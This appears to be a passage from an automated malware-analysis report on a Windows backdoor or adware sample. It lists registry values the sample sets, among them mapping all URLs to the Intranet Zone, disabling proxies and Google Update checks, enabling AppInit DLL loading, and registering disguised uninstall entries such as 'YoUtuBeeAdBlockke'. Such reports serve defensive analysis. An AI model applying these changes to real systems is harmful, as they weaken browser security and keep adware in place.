"Seed" = "B7 57 EE B0 E5 E3 10 EC 02 BE 43 EC 5D 4E C1 7D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1664 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 53 70 89 AC 35 2C E0 D2 72 2C 61 77 C8 5E FE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Follow"
"DisplayName" = "Follow"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1252 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"
"NoRepair" = "1"
"ProductName" = "YoUtuBeeAdBlockke"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "YoUtuBeeAdBlockke"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 2F 19 38 DB C5 53 B7 CA E3 49 4A 7E BC A3 4C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:596 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"TyHelpTFUO.exe" = "TyHelpTFUO"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"%original file name%.exe" = "1cae3ce62857807fb52a3fa4bf6a6107"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 7E 28 95 12 E0 26 E7 60 C0 15 E5 45 3F 9D AA"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process TyHelpTFUO.exe:1516 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"Publisher" = "PriceLess"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"DisplayName" = "Support PL 1.1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"
"usr.1" = "mPgPJqqomjlhabcdef"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"414bc593" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoModify" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un /uq"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"
"8b9e4cbc" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"CategoryName" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"
